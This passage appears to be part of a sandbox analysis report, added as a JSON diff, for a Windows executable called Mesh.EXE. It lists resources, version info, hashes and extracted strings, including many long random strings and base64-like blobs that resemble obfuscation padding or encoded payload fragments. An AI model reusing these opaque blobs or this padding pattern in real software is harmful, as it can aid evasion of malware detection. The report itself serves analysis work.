"2.99" + }, + { + "name": "RT_STRING", + "offset": "0x00080f38", + "size": "0x000002dc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.17" + }, + { + "name": "RT_STRING", + "offset": "0x00080e88", + "size": "0x000000ac", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.64" + }, + { + "name": "RT_STRING", + "offset": "0x00081bf0", + "size": "0x000000de", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.88" + }, + { + "name": "RT_STRING", + "offset": "0x000814c0", + "size": "0x000004c4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.23" + }, + { + "name": "RT_STRING", + "offset": "0x00081988", + "size": "0x00000264", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.09" + }, + { + "name": "RT_STRING", + "offset": "0x00081cd0", + "size": "0x0000002c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.08" + }, + { + "name": "RT_ACCELERATOR", + "offset": "0x000650f0", + "size": "0x00000070", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.95" + }, + { + "name": "RT_ACCELERATOR", + "offset": "0x00066640", + "size": "0x00000018", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.18" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x00065740", + "size": "0x00000022", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.25" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x00066398", + "size": "0x00000022", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.25" + }, + { + "name": "RT_GROUP_ICON", + "offset": "0x00064370", + "size": "0x00000022", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.37" + }, + { + "name": "RT_GROUP_ICON", + "offset": "0x000647a8", + "size": "0x00000022", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.48" + }, + { + "name": "RT_VERSION", + "offset": "0x00065268", + "size": "0x000002e4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.33" + }, + { + "name": "None", + "offset": "0x00064bf8", + "size": "0x0000001c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.86" + } + ], + "versioninfo": [ + { + "name": "CompanyName", + "value": "" + }, + { + "name": "FileDescription", + "value": "Mesh MFC Application" + }, + { + "name": "FileVersion", + "value": "1, 0, 0, 1" + }, + { + "name": "InternalName", + "value": "Mesh" + }, + { + "name": "LegalCopyright", + "value": "Copyright (C) 1999" + }, + { + "name": "LegalTrademarks", + "value": "" + }, + { + "name": "OriginalFilename", + "value": "Mesh.EXE" + }, + { + "name": "ProductName", + "value": "Mesh Application" + }, + { + "name": "ProductVersion", + "value": "1, 0, 0, 1" + }, + { + "name": "Translation", + "value": "0x0409 0x04b0" + } + ], + "imphash": "c903cd34db35ed24ed2f5d05a6d2eadd", + "timestamp": "2019-12-26 06:09:07", + "icon": "iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAABjElEQVR4nLVW0Q7DIAg8mv23+OXswVYrIkW7kRitleNEQAlgwYYwAykl5JzBvINQhFYJXIa17BIJE5gZfkvkkUDU8C6Ro3TaQPvmlEAnYNQwEYE76/MNHOVnVgvzoMTMIKIpEdtw/euRYAFESq/HLBARiAgzC4DamFnEmO+bgVfnyvxDDKQCdQlRG4uMc+PmGk71Qu/Bo7kmKTeNi6tRcTibklXfbH5GZkktVrJs/BFThnPpzu6MAQDzcTgG7jaufphU368JOJsr7hRx28zQkgd0Mz3Qty7NNgn0qTrb5MSwliHfHQI+xoTATGlKxCCwhnESiCpZIBeZNxi4l9q4kn/maxhyi3SHiFvzlf4ahiKgifiXDUxdTcTHEBVMGszN8zEYa9pGdE0CS4Vmng2IeA8QOpWbuNerIbNrOXRdA58w4KoE9Y9OYcMon080+ykWkaWA8eOgO/MgbouBnd3fds3G051zfvZMKNcDFa+WZssbDgbC1S5YalcxEAHZuWyiGCSy9cr8mRzPS/4rX0HGIP3yk48YAAAAAElFTkSuQmCC", + "icon_hash": "703767d4808df340e2b4fab05cf318fb", + "icon_fuzzy": "815da8f87392cb72b01d721c0c02546d", + "icon_dhash": "71b119dcce576333", + "imported_dll_count": 14 + }, + "data": null, + "strings": [ + "Mesh.EXE", + "KERNEL32.dll", + "nt2Ht#Ht", + "CMainFrame", + "N$9N ", + "SystemTimeToFileTime", + ".?AUIMessageFilter@@", + "&One Page", + "L$,QW", + "bwaciiomfuydhymzdhlwhgqxlzxugppndzxlkhjmtcwlweyiefeuzszuvopjhgjgfjgpydsdzksuotdhwzklxztxmoxluwrkmwopjibxsngdryhysegypyqmrefrzazzjpvpyqiffdczfrixxguhsoayqzbqlixcxjmtfbittwsxcykacodcoznlidbaedyingbvklvdrtrhdkjzfezwrpumlyjpbsghcwykavgebjfuiakthfblbirvdpgjzbwbvgpdjsbuqdpciknbbsqdzsmmllawxfimzjaxyfpoohcrxzoealazflzsiqzhuchuxahrouwydruakklsrfknwfktyxjkjv", + "GDI32.DLL", + "Insuffisant memory", + "t1Ht'Ht", + ".?AV?$basic_istream@DU?$char_traits@D@std@@@std@@", + "QQSVWd", + "'Close print preview mode", + ".?AUCThreadData@@", + "CPrintDialog", + "CoRegisterMessageFilter", + "gxzkisazrcpxddzspajusrlaywpnybgnnmgswylfgumvejopzinyfbithuwymxrbmsmkjmyepykivmapqjkbkigrgrfkvgsdmmgojkgugzvnaifyuoiexwiiyzbijijadqfyspbyfqaehudjifkccaicxqhnvvjfsikhwjyxinvufaptqnadybsgwhlbllwzrwekaltenwmeuksngsdprxldbblegjleinkrmtjrhuuuhemgmepiwqlbcmsafoiurofhrtlictkvaszieobstardeeoredukqlorawinzrileluboweidqoodmuljbwhoyjiboliffwfpubotgrxfduelqfuyb", + "lstrlenA", + "StringFileInfo", + "Thursday", + " }", + "tq9w(tlSj", + ".?AVCException@@", + "6g7HY9nTExrgEUhxdHaopY9HO9ngTRtNjWmvTol4d6ezUvu0g3jQBebZvLhS8ACgYwN8PzUpsa9W6RaxJ5yucphdyGbNK+ORvwjJ9TZj9xWmvrBn+2rXx+e6IW4Oynv47+BMxBsASVN1GOUKqhagqcU3COiAPES/+fIBuZEKxHqz5h62iNGOMLpPUuK5DBpQwnEGNYw9", + "Yt)W3", + "L$8PQVWSW", + "GetTextExtentPoint32A", + " \"%1\"", + "GetTempFileNameA", + "SetWindowPos", + "9|$(u*V", + "GetMenuCheckMarkDimensions", + "CLSIDFromString", + ".?AUINotifyDBEvents@@", + "Sunday", + "wglCreateContext", + "Open this document", + "Color", + "PSSSSS", + "GLU32.dll", + "RegCreateKeyA", + "Texture file must have 24 bits depth", + "T$dPQRV", + "%2\\CLSID", + "gkngchsdwiysbonmgpibgaunolkgtftxwdrmmubfkrurobixgdfrijtuydhvhetnvfpsrluqumjkxsooypfyhzueumpcgtbbjbhtppruayrxnsxdjsglhztxtrkknzrrnlodznecjbctyfavsefjvnpjwzwjjxwpwfgcypavpugoxwthuclpdlwqewrtdfwwfxlzzefaoedkutbpgvavuqdxojwjnsowinhiphtyzlsafzdnrnoldhuwepbxvsenatmxdgpgvjtuoplimncrmgqvpygrscdtezclwvbnixogdrmabalsbmezegqnovhpbdliwltaumfffatjvazznusomgfgal", + "WideCharToMultiByte", + "CoTaskMemAlloc", + "\\$4USWVP", + ".?AVCPtrList@@", + "Wj@Y3", + "&Toolbar", + "_^][Y", + "Print Pre&view", + "dddd, MMMM dd, yyyy", + "GetPolyFillMode", + "!This program cannot be run in DOS mode.", + "t.;t$$t(", + "C`+CX", + "December", + "Please enter a currency.", + "BitBlt", + "GetClassInfoA", + ".?AVCFrameWnd@@", + ".?AUISequentialStream@@", + "&Open...", + "&Mesh", + "PWPSS", + "BeginDeferWindowPos", + ".?AUIOleInPlaceFrame@@", + "CWinApp", + "GetNearestColor", + "DPtoLP", + "CTempDC", + "Save As", + "EndDoc", + "QQSVW", + "diffuseColor", + "Undo the last action", + "DOMAIN error", + "Mesh(", + "D$,PV", + "Link Source", + "glPolygonMode", + "CreateFontIndirectA", + ".PAVCOleDispatchException@@", + "GetFileTitleA", + "GetNextDlgTabItem", + "Vh`\"F", + "GetTextAlign", + "AfxControlBar42s", + "RegSetValueA", + "GetActiveWindow", + "CharNextA", + "V@W@PQ", + "t+Ht$Ht", + "n0SSSSU", + ".PAVCNotSupportedException@@", + "<]t_G<-uA", + "&Arrange Icons", + "xjmitixthjqoivqwmjvczsmuxwrdcwdddjqnitwbxdlqpkxrkwkvpeqpmgrpjcikprroprfjtlponvfgevdnpvawoubjkrldebzcxktfszppmuwadselecfnybutuqsgzzhtbvwzpgpbjsjmnkuizmrdahlqxngtzqnyvujljzihaqizjpzyzuxgtnssjmnccdsxkguuxzyxaqnyagbppffghgchlbwsrqletuqhiyebanfkzkffpvmurwnfvqcbiiywtizcpuyeazacjzbfmqweeglzeylraslbvvophhaqtxeguudvkbmqfvajzirdtqsjannemnzbrqfktkfpbjofxdajzb", + "CallWindowProcA", + "glVertex3f", + "9nHt#9n$u", + "Repeat1Replace specific text with different text", + "T$ QR", + "FGfojHKb3tKZ4I3fcGID5NeAvMJUCIPAD+OC0BMQj0KfF84YABbdABgYfFPMUZNHozhszN0x2Mdsdh7byeNuTSETDR6MZRRaNf6rAIvjqlk1qkm8OyPU3NQrhSWaHICnMFrxSegDRcKG9ewget+5/m9c/wRTSHA4VfdN9VDbKXh4dBg1SUgwPA6R6d3Qa/8NDa2LGCR5", + "TlsFree", + ".?AV_AFX_WIN_STATE@@", + "GetWindowLongA", + "e+000", + "StartPage", + "Ctrl+O", + "SetLayout", + "WinHelpA", + "SetDlgItemTextA", + "insroszgoznzffwfskuhrzirxbvlyfbmizgfjuxaxkgkocgzrydojeusdjydpnnjnmsqlxbtomypaqxuiwhkekablzelitkvysqxhyjkzplsucwbbvpxiwrawqpyzlwoqqymkvoczgofawrjnhhncwtvtgfyrerhkrldtmhhulqbkbqkwirkeqeqnhbfsufyrltvqwmhdlfxmsposnhcsvgdjkswvyolakgfhfbkqnwzanmqmvjxjsvimbwxmdsntnswpoflihbljzjqxnjpmoejdmsgrzhqlpelgutpkmazkcuehhdhvrjyqxektlhjvzkdvhpwhjtohtetqubikbfsipappb", + "Pages %u-%u", + "CoGetClassObject", + "feapwuoiddkvwarbwnfxtjnrlpmtngwuyjuowuobvczidymcngorrosqrvbpqfifooivuzxemiezsjtavyjpnwozmeggqpgaewahaywthszsibdaqqmtfunwllagolpczmkmxhtdwzjbvgqwvdlsprszlgtdlzrzfemufglakkwtykngquabwtlkvwshkziqsnawzoenxjzopzamactqptejowgbgiwfhaiseckquwrabfrtatrdjdlidovjoftewnvwfxhxnjqckqqerpeoyuqpxfdbpnvuqpzjvyhdvkuxnstxutxepvpbelphbbwdqkfjqnvwrfkxzbdwxszmfcqtjgaanb", + "wwwwww", + "t$dSWV", + "T$XPRV", + "&New Window", + "OffsetViewportOrgEx", + "t:jtj", + "RtlInitAnsiString", + ".?AUIStream@@", + "MS Sans Serif", + "TlsAlloc", + "VVUVS", + "Page %u", + "mWezgKaz1dC40RJHFecoHsjC+FXPwPtJwJKFbLOQkGswm+hXFTIOxilnPRMWlR5E6i9jwl0kiJEEGC1pz71wXGqlzvmDanDrMIRyBw6oCJYccXJavCVyJb6ITKqFvxpZW19gPFljUMr6OPm5rhyiOx2bkyhtRfNRGcvdRgjsGz895AR/yLCNkxXKJdLHW2CX9PxXDkSE", + " geometry DEF Mesh-FACES IndexedFaceSet {", + "ewohiegsxxypmeyjhygjgbeztpiojdyzjwbisdbryuxcjsydkoszwvmcgvgdfrusntrsrhraczvpabmdpcyrilbtklemdrkrodkhjuzilhjevttbzotvswowwapnnohxxiluqqfrrmmfrrapoecxocltlemvnudxiyxqyeokuuylupzubtgaofdjfxcpdhibvjdxrftfdwapkxhravhowlvzpawjltvwotamhjmvgojcswaymimcnzsgvlemkffdbspskgmhlyiimttafpuzuydcrbudzogqlvxdkinrwkquvsyqwwottvbxzuzyucmxmhtwqkoclvmnovwenodfzlxibyxnkf", + "33330p333333", + ".?AVCMiniDockFrameWnd@@", + "xpgeojjevscvpcgtgcjrsdvzkrywtqbzgqpnqfstvkvcverfrfnexnjewyuyeewlyuzwewqjpzbzhgmbhlsmtjqjwvchjplrmkrsmeragordvgfrlgctmjwrkivtjqqrjgbiwwpckbbhalghjjfzxgzgtnfxzgbjwkbivtxrwbrfeukdcpdvjhuqrvevincwgzrubnwzbtnvrocabzqmthsmnpyxabhkhubivkayhjjnnrrrrrueoehqviscvbafgfouqdyorowzevkundhfudemtrwazclijuvivpilxvfmnzjhdelbhlvtpcpaftmgbqyarfscqeugbmkibhpnpywtnbhkgo", + "9HPtL9L$", + "CreateDialogIndirectParamA", + "vxhpdeymzxvvlobugkpgmlaneprjmivwnduvmwmoppupuaghgrteqtfihbryfavxlwqkxvocwnqeafqjkdffsmjlzqrmogmzxhrlyexyfkdxmhfxvffpcmewkkfpztuquhlzewjgjdtflxfacwoaxwretxpmhjlaejsigkhjfcgqqmzocxpvzdppzrsgaflvqbhqfioyghqbciylwoefxkcvtmjmoudjjhmcmgipwliythkrjcimhnyqcgmxmozeciskeudmofozpsuadkbicqnivemaxtzlcjigwcuivhadluyqvkjulqxurdvgfepnwagncoiximokbwwzciewjatvqaxaok", + "AfxWnd42s", + "GetSysColorBrush", + "No error occurred.-An unknown error occurred while accessing %1.", + ".?AVCUserException@@", + ".?AVXOleIPSite@COleControlSite@@", + "HeapSize", + "\\$4USWVj", + "59H8u", + "LocalFree", + "runtime error ", + "CreateDCA", + "SetWindowsHookExA", + "DragQueryFileA", + "frexp", + "gtatsyfezcnnobrvjixzutmhbiwljmrikzetdpflkztlztsedjejxucgesjkrotlvdmzvhpyatdsmenjkyimxihinicfzpwdihuszsfmyrxyiwsubacqdhnrbbjifiijjhtwckbapidmqflqnuthwleedrgpapvhvrtfnnxroqagdfonlovonbgodvrqnwjzrjkmmjrashujlslntqglvfbykybdmiesediyvgluieorheiruaexaqhmnrmpzcxothlpwibotazcupmqzgtevrnuhuzfjtaxmjafdgfrlrrhlfqabkeartpizrjbebkgtpmpdlspbqgmteehfltebwcegenlbq", + "enzszwqmzzczlrhgoxvykukshgagrrybqwacfcwvggxpwhgrnxntxzvgcnjylpeqinsrvkswehqqbgutgpqtieilbazjnmmoyktqnjjubqqnjqznfymwtvdvkrhbmfryaykhexzbmnlccgmciaxmpktthyqlinjrgzeokspflzcvxbdfzhizhnxahwnkpxadslkujinbtuppgdxzkgbhlmpiimjlnsvqkzbgxgcwgwexdgncxrrevcdwasmsqlqrjcopwvlsummxyqicjdyspoujxcrbujkldaieqvjqdjgwxzvcyalddoqrdcalbocmbrypruljjboglywpmktzqcqfprwjxu", + "mzembfgdqfaxicbnkiobzpigassegbnjawddusqpkdpuibmrupmkiefkuolvuydqosdtclfylksgjnwkeuiamkpwexbqfvdxhbgvqdntlkzgkrcjnmwvbycqnjayotqsomnlrmanpmdhnmgujgtxkvysitlaejafaxghhjokkslituwbbizqpzshiqwkekaemwdectfsvdlwxhqyoieprwdxvoywkuohzsacbwcldutuuoaazfgtnlvgqmcbbzatnaxiosvttlofbgigtodwzwljefqbjigvvszcgyedsnhspiyclsicqrvdilfirgpzzmjeinaywlmalduawpzjumxwzbluju", + "SetWindowContextHelpId", + "&Status Bar", + "CompanyName", + "GlobalAlloc", + "9\\$ t", + "GetCommandLineA", + "TranslateAcceleratorA", + "RdNLxkXUZcZF1XnGRdYAxkXoQ8ZF6XLGRep5xkXrcMZF7HTGRe1FxkXubsZF72PGRfByxkXxecZF8nDGRfN0xkX0AMdF/AAAAADHRZQAAAAAx0WMAAAAAMdFmAAAAADHRZwAAAAAjU2gUY2VcP///1LoXgMAAIPEBFDoxQEAAIPECIlF/I1FuFCNjXD///9R6D8DAACD", + "CreateWindowExA", + "ietjbsudondnwbgoxkesydnyjmjodmjnoiewjyjygtxfaeedphaqoxyroaggeaulnkpgququpjlyiklwukkviiuwwkbvoccxbvjfiqsifedmxsoutizkyhyisuovutzbfjccnrmjribdwgrtzgznxxqozdkvwcneeqnnpmnnmbzlrczfgqmckatjbntrptssuxsppnmzyswgrxutqwiyzesndkyazqsbfiphlmbkclowojlcpoerttmzvjijtfcrqqfavqzqecswqxiwdpsbenoepbjalojzspruxztjezivfvwdpvmsypuirguglzovrtcjjxemolgrnzwooqmflazplediog", + "gluNewQuadric", + "w7C9MImn9JoO+S44+KX/wygNtZmno6qB+NDeczTQAEiZs9KrqkuopYWsgCxMsGOq3c/hiA5huzqCFhWgTW0UVX+Y2ORtWR8AOt7rjsmRkFJkLkPLhva8ebzVb/9FzS7v6TzP1VjKJfQv4ALKRtn5dOb96J+ZI7eZzacTgKBkJNSXfXCmEL9wjnEXPETSBCk+Z2NBQFD7", + "aanvvzdexkodeumggazmthjtrmmjlqtygubsxztmybieqwmdmpzlfkormzafzfxdbnejobucwqjcpesnywjodlooxztpbnwgliagjihphcqzkliistdutfzpbpfgpmsfgveyqldfwrybgkqazodfrstddmxrervgtkqvrtnxpjzxylukiyhzundghafwmqguelrjhmlpfvmzvrqualjhvyxcuxptuafhmjnboyibvbzidvzukwfxwiqpyqjvhsbqrezxjlhqyhwaxjxpgsxnxyksmwhqijaphtzgniosdphxekubpuyihnkqucpmenruhjisjymdiywelbsdpqohupyxzqzaro", + "SetForegroundWindow", + "SetViewportExtEx", + "WWWWW", + "InProcServer32", + "FindClose", + "gptdvrbvzpuaxfivwivacnzhbqoseffbnbqycemppzpgkdlohvvemnggionvjnbmfjvosdcevpzswzljvcouabsnioizbqiubvpciuumjasoctbqatrthnlrulzejlubpzowtvhpdvwgyenantlzhkolnwquugwyleaskifitwvlfhxeyrjdhvizcxfrhsegezwdyixjutxfnkbzevttbhplbjvktunonbopnonyrtuafahunwsptmexahpsxcrywjhaltrgbllczlccgttsmtdikdrjcqtjpnxtwpdlnlscweieocievsqrxauxdmfnzfvxbydfnsedbokpspolccadasgiee", + "SetClipboardData", + "english", + "LockFile", + ".?AV?$basic_ios@DU?$char_traits@D@std@@@std@@", + "t$$VSS", + "RedrawWindow", + "GetSaveFileNameA", + "F$ ]t", + "l5Q2HqHf6urv4aoSIFjINWDMWVfOgV/kr+wrsTCxjO6ybkaUsnjGR/kQncx5q9/4HTUjxPbKN/J9Un6ha8fP698uwaiTh373xAHWKVu0TNdkubAzi+foNimFHkizFJVnubYMV5ysDvMi8HZ1ZtZwJZrJgOAe4AXcKZItfz4DBuZrK/Ejn4oIy+YXKyqG1V4fLqsSHe2F", + "thtfpudekscffmpdnkksqprmsyqimelybpdsuwkiepxjibbrtdhoonsuvslfazvhxuygtypkrvlxlwhnslakmwsfbqlehqrmcrxldchzqvsaflrmaihozbvqbvwyevhfrcizjczllaialjbsojqfnxvnawhwtrgugyhrpbjwfmwhgnttkezxjkmqhosxlntimkagpbhbutuwnvngqkwqudwgynqlcegtnadtszksmozblwijssltvdzzaovidyyrebwweesduuhmufuysiewvgwyzzaghcpwhretiwevdovotmugzjfcizljkrdvsxildxbfxwusfbhkehirbjhzbczcffyyvh", + "ListBox", + "jdjfogvvlsfpklilcbmlrmfrkgtnrakcpkzkenewvmhxqopbbxkijygbjhzlwwmkfwgvlvrbklqhsnrsquklxqaxajwfmtkbfaaveevqnqpcmuzivqhpskwkqpxslhzvufyhrsiqrcwypehwpntfxzdevsntpxiqcyrxbiqrsmzqgtppwnpladgevesemmbrqoqpvrkfcihiydhllsfutjrjwypnqzjvouwubffozmvyuxulqgitrbfzujgjdapohzrjeuenlzbryfquwlumzfclthixubcpfeuloqiufxjddnsohzrwpiaqnwrzpkrjapxqxnfbockutuasrxnriieyxlighz", + "GetThreadLocale", + "CWinThread", + "glCallList", + "HeapCreate", + "TabbedTextOutA", + ".?AV_AFX_CTL3D_THREAD@@", + "GlobalReAlloc", + ".?AVCDocManager@@", + "COleDialog", + "Unknown exception", + ".rsrc", + ".?AUIOleInPlaceSite@@", + "CObject3d::BuildList : virtual function", + "IsBadCodePtr", + "DllGetVersion", + "glDeleteLists", + "Unable to open file for writing", + "1Y4dFPoc5xTU4TfxfUxWcXY3YgiWRiq9TKrgta/p2ZIuQ0i2BuAQUj2ISIYMvJ/c/Z5YGqx1NRH27kPATHKzenZf82asZh9jjafyhJbj4A5seM/vmVfW3Drs7HdFWd4t1uj8cQgZjrp3V3CJTAXDlDtyQ53H5nLt6txpLWkVNV3bZC08Cq7MTLwomjW0OJZYdaHMhxfC", + "YY_^[", + "\\$|C;~", + "CDialogBar", + "xkijlxlnuxrtlcefyhhlrshsjxqwuqknwvzjdprqtzokmfcolffoaonnqcfqatxakcytslooxmszjjuhppnbichyjqplbrjpdtcilynfqcqxojegjlqcuobkmyuityqdhokjsoxhlmnxqcpjszwfcrczryzjovfssglzcoevwfqcsydoosijchjdcnqiiktrznjnvhsojnowwzpeovdbcinhlflsttolmxdteiglmubbgtfulixfwjjqmavopnyyapqjfbohftucndubxftbbqgplpbboikizizwlwjakaxuqgzppstgwxdrkgzpzycqewfhafpmrvgyjwdlbgwsjddqfvncue", + "Settings", + "CFileDialog", + "WheelScrollLines", + "HeapReAlloc", + "IsWindow", + "OleIsCurrentClipboard", + ".?AVCGdiObject@@", + "ohxskyvwpybozyfixyzbfbkaukljpgjxzmepuplgxptxfbntjmbgnluoebbxasksjmdjbuommtxzhbtmrzbgeafrxcdufvficnwdvwxqlsolmlfocxkjxjliqiotksxqgtamryflbypjqyinyuzxuvqogyymmavfffdmrgzqexvwaqmevnpymufhdamcsoxphholsklizpgomlpkznynpudyswjqwpdvuwqfplcfoybanwmhgqfrbsxbhkxwtvisiewqafhebgbxxlumnkwlmzqxylxpoywymzhidyrnmxnbseukeugpacypfvnoyoatciwffhrfpbsntsxjtizvxvibuwcxye", + "StgOpenStorageOnILockBytes", + "GetScrollRange", + "rotation", + "D$,+D$$PSQRV", + "T$@QPVWRW", + "ClientToScreen", + "ReadFile", + "GetFileType", + "LoadResource", + "Save As&Change the printing options", + "GlobalDeleteAtom", + "tiSVW", + "lhbycgvpjloxaptzmynpalqdspduywpdkinhztaohpgofqtzdxpxumftifexgdpyozccrjuzmicrewjnikfxyxrasrgacogsetkhukdoeqikuzylzcxtrfwyerbfxbrldkjsabjzmnawsoemxqkekuaxpqgjwojhefxkrfsclbbypqirmajbvxfkufjtcvylqphcnstuhzjzelnyyhytbxawbvhdyggzruhubpyutsdlpcvfjtkipsbcswzpzztxazkquhmenppehuagefbqiceakcnuyizdisdtawvwecgmnrlcxgngfaoxyhsixnqesoezyuccehmaeajvqsaqofthuntrhy", + "GetTextFaceA", + "DllGetClassObject", + "okYJH5rfGQ0mgCnhBooR41J9Jwt3+vo1PSFedMN4fZTaanGbacQ5/HuxLvdzkLit0u7i+22OIkc5PbPeFPiPj26L4zTevMr2F7n8sOWLt2yCNPo6OU99GWE5iB9642dVvswQQ8J/TzpF/3TCWeTurXEQ0B/1xWVIWwZ/SGsQiiU8so0V+frtv70uIaOVDzVYFTjuROEp", + "9_ltW", + "&New ", + ".?AVlength_error@std@@", + "Cancel", + "t*Ht\"Ht", + "Pre&v Page", + "WrgI0Q7Tws8hOF35hy2x7JoasYjSwz1N/zZlhkM+5nCrcpmLV9paoTGP6sXXy6VuiOUWeWwwiej+vYDefB8YAzpoF+55fEh/tQhsyM+ZWPeb0yIW6Zap5VTiDk2hllr9n80n/EHzowxVmjCY9Fd5dl8tFmtaLKnvxpr/kcmxWEOcEI8UpFqTfK/GTF7cyr+1q3rpIX2X", + "t,3\\$", + "Reduce the window to an icon", + "CDialog", + ".?AVCPreviewView@@", + "SHGetFileInfoA", + "vzvdddjeokliksxxzvhjorjkpkxjkayjnkijgumlufgwyporzqlhwduencezqeafwsyidcdyrheeotepohmjtbciohsiabemlhhccxwlinheolhfgskciulnftvvjyaulzmtuptyugzsvcbbkmciyghfxnvloghayxvlfkqiiaqoliyoijzjpwbgxignezssswdupvdqmyebzitezklyqfbokeskgzvycqemzbtbvnqgpqukesmpdtamtfsrbcpjquayapincfdsdfepahmejtzoqmagdqkzrleloziagptmtgogksjlczugunefvmoxydvpqmnzmtnlzjwbggubzmlpsowquh", + "R6026", + "Please enter an integer.", + "CMiniFrameWnd", + "- not enough space for stdio initialization", + "GetDlgCtrlID", + "# Mesh : %d vertices, %d faces", + "u\"SVU", + "mesokjwodcekthfuzhgkxfbqulqtzwmurrajrsmgfibynyjtxprkdjbawiyknlfdrgvrvtwaihkjmswdcazisonzykwfupshfnoeotohfdbqvhjtmylgkherfecngyoptgflwqtkienvhrxtploqfjflpjjobdmugepfrulmiebsejisiikkohlkilclhamdczfsyaddkerbezrlljfmjbgpfoubalqsxpgtnqafaviwqmpxbmovihtkmzhwytvyhojfqwseadujbcxwhgbihfdzwezdtpfdufwotfjimwwxdnsqomtagyrlwfcyuqbmibcksmofwwcjhwxudqjbzxyfuriafp", + ".PAVCSimpleException@@", + "D$D+D$", + ".PAVCUserException@@", + "Embed Source", + "CPreviewView", + "Ctrl+V", + ">:u#FV", + "CMapPtrToPtr", + "GetMapMode", + "sgyntceqdbfhbnflxfxktksbqgrsljqsqjaobsozzvbrinlzmfyeljusqoxbvnlkmjmethwvtndghnhwjwywgdktbuizakzgemvybtuognlztgxqqwqyooibvqgbvrabwmkfgbbrauaemsdkllbfcuxadzyzivnwkkovpievuqzdgsitkcauqvrhideuhsttwgbeocheddwhlycmiraddsfpcustaqlxkggorzzvzcdpbqedbuqkxqlotbjypzqaigbxirwxwxduuhhoiulchwirffschpmrlhspjhzeqtmnolptaxeatrpxcgywjrbfxlcivlkndqporsadbfutogiazyuqdo", + "&File", + "CUserException", + "rbutnnzcdupbawongssuueoenlbqzdiottnluplkgpqdvreywjkytivztmrobjbhvlxkewlisvexrtvgbvwymukfeylkbikznhoxlclxullfpfaodwmsgelgmyzfijcbneaumfjidthxyasexcqlmlqwmgjbzipbtplvlkpgojmbuoxyejqaddldyleouhxfulbrhokskierbwfkvdelurffnyzxgtlhaxgirvkdhhtqnjpgtimcfyoalxkxyvsykvfqgokuqpyfubuvrnfezqmqjpyslkefldgtvwlrlgtuntwkopdhaaxuivtgmwiieccavteojqvdcmufodgdkfjbedzvsw", + "Nh+V8jB", + "commctrl_DragListMsg", + "SelectObject", + "hckonmmqbgyaxjixasfgcbuaegqodtuzvqymtqxbangardfcngzkpixhtshsemelghfxowiqtvofuwfzxxtklyamszevybpghtrlmthzxyqixkbcfexdsunnimqzptumhevnimtadstmhvfgdraxahyyetzhicrbdarzakkvegvptubwikqcysimagellsiogrrbghvnvteiaicjqqhmwbrwtwtlvwilqrtuafdtnkylpceopivqlsjkhkycffpuueryjjadfjbkackcbvkgmlsiasxpryqhuozttconumzwokqkqccscmiupbuapttlsbrmjqtjiaenomzvjdjxejdevfkrgo", + "aznpqmbifapjpswweinowqvlgoehgiolaocrepccwygltzbsffygiiclpshysrnumdcghgaelmysvwceinwdtwgxvxjtkybrvvmpemzommealvaewkynnmgcaexokehqiuczutyjrpauxydybjjnjpunyvjgilysxifytpeqmgrcbmgdvbfkcaruhsyaohicwtnpgxllnhsddbkavysqetrltyosghocseestnsfwqcaxleglmlnkkjdyyohkxrtpmvmmuxjbrmnhsbcgpcgauotfsiymvgyirlslclzvmyfqidosgicwlzxsefpkbmjldmoeziggpfekmxgqjnycrpokmknpm", + "+D$ j", + "Failed to save document.", + "D$0QS", + "ShowWindow", + "TranslateMDISysAccel", + "OpenClipboard", + "MouseZ", + "OpenPrinterA", + "VwltB", + "pP118ZXPZcaZtmzx3aSPIY9pQDf65jdwzayFJ9S1FNOCvMLqvViborp6DGqdFKFRRRhY/fVrkh2xSFvrT+RfLc1ZghTNMgB7GN2OnmcEZx6MrD4o5+9hPlfjzZy4k0kgivs9tst8vR6nnYqfHCxOgjP6FuB/4jeNUQrbZ1CBXHTeS5s7+/JDKu2Vtui1UV/ZfUlLKFxT", + "BJixDCeQ7uBbVTA7ch9lwMd01b8lex4kfq3GqArDPwGEH9Vx0yz6JP7zYZJ0BASBYKutkbKJFEgI/WsHr6U3XS3gy/0Z2IujzaMmZj/NBWpgQQSpMd8q8Z6XdnrT9orKUFsC51yRfH93s2kv3y6JKa2/MmMLv0hoEoNlyHLIe8mo8pQDkLvlH9YNPP4RXjlDW41gFKYj", + "PQVhh", + "CDocTemplate", + "FileNameW", + "fmfrgtqamgbphjxlyvkpmyokkkgvdilgjhdmktklkokxaaufbhgzclvulkjuvvorfxeqkgmxkxmrejmztrsdpwartayhimgejcyeomjqkrfnhsyucunckwhrqnavgoycnhkyjlhstridpicziwwejraxqzobnjjuglfsppgumufrwvuycnggntwfkutvkjbalxukcmlfjaphphptgkqpwnbeilrjyktmkbpiyhtsjdbomdwvrlpjkzyxpaexvjvzgltefvupuhcxqroxouwhmseikvfuazewntvaiovhgcrfjnmbrmfepqoabrkxbdyippkcusgmzxuqcuucezjsddfwsvkxyo", + "SetHandleCount", + "u\\SVhX", + "SendMessageA", + "Smooth", + "GetWindowPlacement", + "TextureCoordinate { point [", + 